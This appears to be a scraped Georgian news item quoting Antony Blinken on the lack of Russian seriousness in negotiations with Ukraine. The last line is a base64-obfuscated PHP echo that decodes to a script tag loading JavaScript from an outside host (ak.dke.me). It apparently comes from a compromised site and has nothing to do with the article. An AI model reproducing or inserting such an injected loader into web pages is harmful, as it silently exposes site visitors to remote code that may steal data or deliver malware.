celsiusi
ავერსი შნაიდერი
ამერიკის შეერთებული შტატების სახელმწიფო მდივანი, ენტონი ბლინკენი აცხადებს, რომ რუსეთ-უკრაინის მოლაპარაკების პროცესში რუსეთის მხრიდან სერიოზულობის ნიშნებს ვერ ხედავს. როგორც ბლინკენმა აღნიშნა, ხშირად ხდება, როცა რუსეთი ერთს ამბობს, მაგრამ მეორეს აკეთებს. 
 
"მე არ მინახავს ნიშნები, რომ უკრაინასა და რუსეთს შორის მოლაპარაკებები ეფექტური გზით მიიწევს წინ, რადგან ვერ ვხედავ მოლაპარაკებებში რუსეთის მხრიდან სერიოზულობის ნიშნებს. ერთია რას ამბობს რუსეთი და მეორეა რას აკეთებს. ჩვენ ამ უკანასკნელზე ვართ ორიენტირებული.
 
რუსეთის განცხადება კიევის ირგვლივ საომარი მოქმედებების შემცირების შესახებ შეიძლება იყოს საშუალება, რომლითაც რუსეთი კიდევ ერთხელ ცდილობს ყურადღების გადატანას და ხალხის მოტყუებას, რომ ადამიანები არ აკეთებენ იმას, რასაც აკეთებენ. თუ მათ როგორღაც სჯერათ, რომ მხოლოდ უკრაინის აღმოსავლეთი ნაწილისა და უკრაინის სამხრეთ ნაწილის დამორჩილების მცდელობამ შეიძლება წარმატებას მიაღწევინოს, ისინი კვლავ ღრმად იტყუებენ საკუთარ თავს. მოვუწოდებ რუსეთს ახლავე შეწყვიტოს აგრესია, შეწყვიტოს სროლა, უკან დახიოს თავისი ძალები და რა თქმა უნდა ჩაერთოს მოლაპარაკებებში," - აცხადებს ბლინკენი. 
759
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");